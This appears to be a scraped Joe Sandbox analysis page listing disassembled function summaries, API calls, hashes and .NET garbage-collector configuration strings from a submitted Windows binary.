Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: CurrentGlobalMemoryProcessStatus
String ID: @
API String ID: 3261791682-2766056989
Opcode ID: 3cbc60183daf17e2fccb2976172cf10b22a13a5ce65424d1e6ea0fd7bd43531d
Instruction ID: 0b0b191f3aa4e129f3325cdd02ddb4e4407d381b41ba224a275fe7b0d726ddcd
Opcode Fuzzy Hash: 3cbc60183daf17e2fccb2976172cf10b22a13a5ce65424d1e6ea0fd7bd43531d
Instruction Fuzzy Hash: 8C41F463B29B4641E957CB369510339E266AF5ABD0F18CB31DF0EA6744FF3CE4928600

Function 00007FF67DCF0550 Relevance: 5.1, APIs: 4, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF67DCDDAA9), ref: 00007FF67DCF0590
LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF67DCDDAA9), ref: 00007FF67DCF0606
EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF67DCDDAA9), ref: 00007FF67DCF065E
LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF67DCDDAA9), ref: 00007FF67DCF0684

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: c480e3b17c3b7e895e30b379d2c7d3fe21071970ef4a9a351df021ce0ece1ff4
Instruction ID: 8c25563ac989a6b94775b4e7deccc6380713fbb69f74ea989459faec5c4f3353
Opcode Fuzzy Hash: c480e3b17c3b7e895e30b379d2c7d3fe21071970ef4a9a351df021ce0ece1ff4
Instruction Fuzzy Hash: D6418D23E2D68281FA209F24E8017B923A8BF94B40F560A35D94DD72A1FF7CE4469711

Function 00007FF67DCCCFB0 Relevance: 4.7, APIs: 3, Instructions: 195
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SwitchToThread.KERNEL32 ref: 00007FF67DCCD092
SwitchToThread.KERNEL32 ref: 00007FF67DCCD09B

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 24ff2dfc20294bcd9dd16e83c93cb601c9c092b067f0375acd745dcc2c3e2eaa
Instruction ID: e7c94489b199e30150846249e6cdaccbf65e5ddaaa8a846940bf830e7f20eabe
Opcode Fuzzy Hash: 24ff2dfc20294bcd9dd16e83c93cb601c9c092b067f0375acd745dcc2c3e2eaa
Instruction Fuzzy Hash: B471A033E2C28386F6549F29A94163926A9BF40754F084B39EA5DD72D9FF3CF8438601

Function 00007FF67DCC29B0 Relevance: 4.5, APIs: 3, Instructions: 34
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF67DCC53C8,?,?,0000000A,00007FF67DCC4420,?,?,00000000,00007FF67DCBEB11), ref: 00007FF67DCC29D7
GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF67DCC53C8,?,?,0000000A,00007FF67DCC4420,?,?,00000000,00007FF67DCBEB11), ref: 00007FF67DCC29F7
VirtualAllocExNuma.KERNEL32 ref: 00007FF67DCC2A18

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual$CurrentNumaProcess
String ID:
API String ID: 647533253-0
Opcode ID: ef0767e406028f4ab4eb664375ae7d293fd3944ac4027851bbb6826bde6e8114
Instruction ID: 61a2f4a8a082504be17fdf4694f1942f0588071e2c1a64933b8d8f4e2827060d
Opcode Fuzzy Hash: ef0767e406028f4ab4eb664375ae7d293fd3944ac4027851bbb6826bde6e8114
Instruction Fuzzy Hash: E3F0A472B1869182E7218B06F400619A760AB49BD4F480634EF8C57B58DF3DC6928B00

Function 00007FF67DCB9FC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EventRegister.ADVAPI32(?,?,?,00007FF67DCB5904), ref: 00007FF67DCBA015

Strings

gcConservative, xrefs: 00007FF67DCBA084

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: EventRegister
String ID: gcConservative
API String ID: 3840811365-1953527212
Opcode ID: 368ea8b34af60ac17b34259db04c81eed38ab11d7739e59b3831215b0b82d1b0
Instruction ID: 948d47d0ea292883a0a44f6bcb25d182378a6a5cd04d0fed4d4775c023e30b4e
Opcode Fuzzy Hash: 368ea8b34af60ac17b34259db04c81eed38ab11d7739e59b3831215b0b82d1b0
Instruction Fuzzy Hash: 1D31F723A386C7D6EB01DB56E9805A83364EF45748F444A36DA4D876A5EF7DF046C700

Function 00007FF67DD18F4C Relevance: 3.0, APIs: 2, Instructions: 21
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF67DD19059,?,?,?,?,00007FF67DCBDC41,?,?,?,00007FF67DCBE1BC,00000000,00000020,?), ref: 00007FF67DD18F66
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67DD18F7C

Part of subcall function 00007FF67DD19AAC: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF67DD19AB5

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
String ID:
API String ID: 205171174-0
Opcode ID: f6556d4f51cde9d22dda4e66d06e902f05e19e968265b4e597cac14e0ffc368f
Instruction ID: d6bc491dcee5e82ea8a4dae872870c75e5f1232b53c372e32a518dacc36dcd08
Opcode Fuzzy Hash: f6556d4f51cde9d22dda4e66d06e902f05e19e968265b4e597cac14e0ffc368f
Instruction Fuzzy Hash: FFE0EC02E7D10726FD28A56215150B401528F09774E1E1F30ED3DC92D2BD1EB89D4311

Function 00007FF67DCBB360 Relevance: 3.0, APIs: 2, Instructions: 18
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 00007FF67DCBB379
CloseHandle.KERNELBASE(?,?,?,?,?,?,00007FF67DCB95B4), ref: 00007FF67DCBB38C

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: CloseCreateHandleThread
String ID:
API String ID: 3032276028-0
Opcode ID: 0606a988fafc191b16ad9ad3a3988415e47add61d3bd0454d914aefe8f699e32
Instruction ID: 96a3606c96cea060abec6d251f29775539e90b4421e8bbca85d5ea25637fa376
Opcode Fuzzy Hash: 0606a988fafc191b16ad9ad3a3988415e47add61d3bd0454d914aefe8f699e32
Instruction Fuzzy Hash: 08D012A6E1564182DB25EB616C111651BD17B987C4FD44638DD4EC3320FE3CD3168904

Function 00007FF67DCBFEC0 Relevance: 2.6, APIs: 2, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 00007FF67DCBFF40

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4d347c583ab5b81ecdc4f6afad0fb1ae00dc0cd9d2a9cab1d9c0510b902e5dc8
Instruction ID: f2cc1c05f0218a15c5cbe0e855dbf124cad82b8eb21245e8a5bfcf4c485118a2
Opcode Fuzzy Hash: 4d347c583ab5b81ecdc4f6afad0fb1ae00dc0cd9d2a9cab1d9c0510b902e5dc8
Instruction Fuzzy Hash: D331B033B15B5186EA14CB16A50012A67F8FB49BD4F048A35EF4C97BD5EF39E4638340

Function 00007FF67DCC2970 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00007FF67DCC2986
VirtualFree.KERNELBASE ref: 00007FF67DCC299C

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7bc02cbd53fab7e2ccf2e21147a4af897a009dbcf47cf5d32d6ac4e9de3e81f3
Instruction ID: 1e73db707ea55867585179deb77caba19c047975c7e173aff6cd7858458fc668
Opcode Fuzzy Hash: 7bc02cbd53fab7e2ccf2e21147a4af897a009dbcf47cf5d32d6ac4e9de3e81f3
Instruction Fuzzy Hash: E6E0CD25F2610182FB18A7126C4191416516F4D750FC48534C40D83350ED2D52EB8B50

Function 00007FF67DCC74CE Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF67DCC7514

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 3c8c719a2a8db492cc390e112f25d5732aaf8fb4ded53f41817d31610e6627c2
Instruction ID: 07490a8d31e7e40482000bc31e07beb363bad50a94c20cc8e7591b71481c7fbf
Opcode Fuzzy Hash: 3c8c719a2a8db492cc390e112f25d5732aaf8fb4ded53f41817d31610e6627c2
Instruction Fuzzy Hash: 8441B763F2868242FA108B2594425B923A5EB84BE4F454B32DB9DD37C9EF3CE5438740

Function 00007FF67DCB59A0 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67DCBAAB0: VirtualQuery.KERNEL32 ref: 00007FF67DCBAAE2

RaiseFailFastException.KERNEL32 ref: 00007FF67DCB5A28

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFailFastQueryRaiseVirtual
String ID:
API String ID: 3307674043-0
Opcode ID: 2989ca71329d643b99a6d4e1e241b7370baf4db862422a3503335ab56397ce0d
Instruction ID: 09e9ee164809b52eadc5a5d9546a2292ce89250af520ed861e4ba66751858baf
Opcode Fuzzy Hash: 2989ca71329d643b99a6d4e1e241b7370baf4db862422a3503335ab56397ce0d
Instruction Fuzzy Hash: 38116A72A18B8292DB24DB25A4411AAB360F7457B0F144739E7BE877C6EF39D0468701

Non-executed Functions

Function 00007FF67DCC2CD0 Relevance: 111.8, Strings: 89, Instructions: 525COMMON

Download Yara Rule

Strings

GCProvModeStress, xrefs: 00007FF67DCC308F
SegmentSize, xrefs: 00007FF67DCC2F68
System.GC.CpuGroup, xrefs: 00007FF67DCC2E48
System.GC.HeapHardLimitSOH, xrefs: 00007FF67DCC3485
HeapVerifyLevel, xrefs: 00007FF67DCC2E92
ConfigLogFile, xrefs: 00007FF67DCC321D
GCHeapHardLimitPOH, xrefs: 00007FF67DCC34D8
BGCSpin, xrefs: 00007FF67DCC2F0A
System.GC.HeapHardLimitSOHPercent, xrefs: 00007FF67DCC34EB
GCHeapHardLimit, xrefs: 00007FF67DCC3116
System.GC.HeapHardLimit, xrefs: 00007FF67DCC3107
GCLargePages, xrefs: 00007FF67DCC2E82
LogFileSize, xrefs: 00007FF67DCC2FC2
LatencyMode, xrefs: 00007FF67DCC2F86
GCHeapHardLimitPOHPercent, xrefs: 00007FF67DCC353E
System.GC.NoAffinitize, xrefs: 00007FF67DCC2DC0
System.GC.RetainVM, xrefs: 00007FF67DCC2D7A
LOHThreshold, xrefs: 00007FF67DCC2ECE
GCConfigLogFile, xrefs: 00007FF67DCC320C
CompactRatio, xrefs: 00007FF67DCC2FE0
System.GC.HeapHardLimitPOHPercent, xrefs: 00007FF67DCC352F
GCEnableSpecialRegions, xrefs: 00007FF67DCC31A5
BGCFLSmoothFactor, xrefs: 00007FF67DCC3359
BGCMemGoalSlack, xrefs: 00007FF67DCC3287
System.GC.Name, xrefs: 00007FF67DCC35B2, 00007FF67DCC35CA
GCHeapHardLimitSOH, xrefs: 00007FF67DCC3494
BGCG2RatioStep, xrefs: 00007FF67DCC3467
BGCFLkd, xrefs: 00007FF67DCC331D
System.GC.HeapHardLimitPOH, xrefs: 00007FF67DCC34C9
GCCpuGroup, xrefs: 00007FF67DCC2E5A
BGCFLkp, xrefs: 00007FF67DCC32E1
System.GC.HeapAffinitizeRanges, xrefs: 00007FF67DCC3020, 00007FF67DCC3041
HeapCount, xrefs: 00007FF67DCC2F37
System.GC.HeapCount, xrefs: 00007FF67DCC2F28
GCHeapHardLimitSOHPercent, xrefs: 00007FF67DCC34FA
BGCMLki, xrefs: 00007FF67DCC33B3
System.GC.HeapHardLimitLOH, xrefs: 00007FF67DCC34A7
BGCMLkp, xrefs: 00007FF67DCC33A0
BGCFLki, xrefs: 00007FF67DCC32FF
BGCFLEnableKi, xrefs: 00007FF67DCC33D1
BGCFLGradualD, xrefs: 00007FF67DCC3377
GCLogFile, xrefs: 00007FF67DCC31C8
GCGen1MaxBudget, xrefs: 00007FF67DCC30CB, 00007FF67DCC314B
BGCFLEnableFF, xrefs: 00007FF67DCC3449
ConservativeGC, xrefs: 00007FF67DCC2D38
GCRegionRange, xrefs: 00007FF67DCC3169
BGCFLSweepGoalLOH, xrefs: 00007FF67DCC32C3
System.GC.ConserveMemory, xrefs: 00007FF67DCC356F
NoAffinitize, xrefs: 00007FF67DCC2DD2
ConcurrentGC, xrefs: 00007FF67DCC2D25
GCNumaAware, xrefs: 00007FF67DCC2E27
GCConserveMem, xrefs: 00007FF67DCC357E
LOHCompactionMode, xrefs: 00007FF67DCC2EB0
System.GC.Concurrent, xrefs: 00007FF67DCC2D13
BreakOnOOM, xrefs: 00007FF67DCC2D9F
GCHeapAffinitizeMask, xrefs: 00007FF67DCC300D
LatencyLevel, xrefs: 00007FF67DCC2FA4
LogFile, xrefs: 00007FF67DCC31D9
RetainVM, xrefs: 00007FF67DCC2D8C
ForceCompact, xrefs: 00007FF67DCC2D59
BGCSpinCount, xrefs: 00007FF67DCC2EEC
GCRegionSize, xrefs: 00007FF67DCC3187
BGCFLEnableTBH, xrefs: 00007FF67DCC342B
GCEnabledInstructionSets, xrefs: 00007FF67DCC3551
ConfigLogEnabled, xrefs: 00007FF67DCC2E06
GCName, xrefs: 00007FF67DCC35B9, 00007FF67DCC35DC
BGCFLEnableKd, xrefs: 00007FF67DCC33EF
Gen0Size, xrefs: 00007FF67DCC2F4A
System.GC.HeapHardLimitLOHPercent, xrefs: 00007FF67DCC3515
GCHeapAffinitizeRanges, xrefs: 00007FF67DCC302C, 00007FF67DCC304D
BGCFLEnableSmooth, xrefs: 00007FF67DCC340D
System.GC.LargePages, xrefs: 00007FF67DCC2E78
BGCFLff, xrefs: 00007FF67DCC333B
LogEnabled, xrefs: 00007FF67DCC2DE5
ServerGC, xrefs: 00007FF67DCC2CFA
BGCFLSweepGoal, xrefs: 00007FF67DCC32A5
System.GC.HeapHardLimitPercent, xrefs: 00007FF67DCC3129
GCLowSkipRatio, xrefs: 00007FF67DCC30E9
System.GC.HeapAffinitizeMask, xrefs: 00007FF67DCC2FFE
GCHeapHardLimitPercent, xrefs: 00007FF67DCC3138
GCHeapHardLimitLOHPercent, xrefs: 00007FF67DCC351F
System.GC.Server, xrefs: 00007FF67DCC2CEB
GCWriteBarrier, xrefs: 00007FF67DCC3591
GCHeapHardLimitLOH, xrefs: 00007FF67DCC34B6
BGCMemGoal, xrefs: 00007FF67DCC3269
BGCFLTuningEnabled, xrefs: 00007FF67DCC324B
System.GC.HighMemoryPercent, xrefs: 00007FF67DCC306D
GCHighMemPercent, xrefs: 00007FF67DCC307C
GCGen0MaxBudget, xrefs: 00007FF67DCC30AD

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCWriteBarrier$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
API String ID: 0-658696054
Opcode ID: d53b43dfd84efb105ad5ae99199b30ba4597350805d64627f0ed3042d0857104
Instruction ID: 16b74cd1cde01a97cb4a78b3a6eb679ec3157ce848760cf2daf2e1fe1acf2927
Opcode Fuzzy Hash: d53b43dfd84efb105ad5ae99199b30ba4597350805d64627f0ed3042d0857104
Instruction Fuzzy Hash: 98327132628A9B81EB619B65F810AAD73A4FF557C8F415632D98C47F64EF3DD202CB04

Function 00007FF67DCC3990 Relevance: 102.8, Strings: 82, Instructions: 270COMMON

Download Yara Rule

Strings

GCProvModeStress, xrefs: 00007FF67DCC3C34
gcConcurrent, xrefs: 00007FF67DCC39C2
System.GC.CpuGroup, xrefs: 00007FF67DCC3ABD
System.GC.HeapHardLimitSOH, xrefs: 00007FF67DCC3E9D
GCCompactRatio, xrefs: 00007FF67DCC3BEB
GCSegmentSize, xrefs: 00007FF67DCC3B97
GCNoAffinitize, xrefs: 00007FF67DCC3A53
GCHeapHardLimitPOH, xrefs: 00007FF67DCC3ED8
BGCSpin, xrefs: 00007FF67DCC3B53
System.GC.HeapHardLimitSOHPercent, xrefs: 00007FF67DCC3EEB
GCConserveMemory, xrefs: 00007FF67DCC3F55
GCHeapHardLimit, xrefs: 00007FF67DCC3C8D
System.GC.HeapHardLimit, xrefs: 00007FF67DCC3C86
GCLargePages, xrefs: 00007FF67DCC3AE4
GCHeapHardLimitPOHPercent, xrefs: 00007FF67DCC3F26
System.GC.NoAffinitize, xrefs: 00007FF67DCC3A4C
System.GC.RetainVM, xrefs: 00007FF67DCC3A11
HeapVerify, xrefs: 00007FF67DCC3AFF
GCHeapCount, xrefs: 00007FF67DCC3B6D
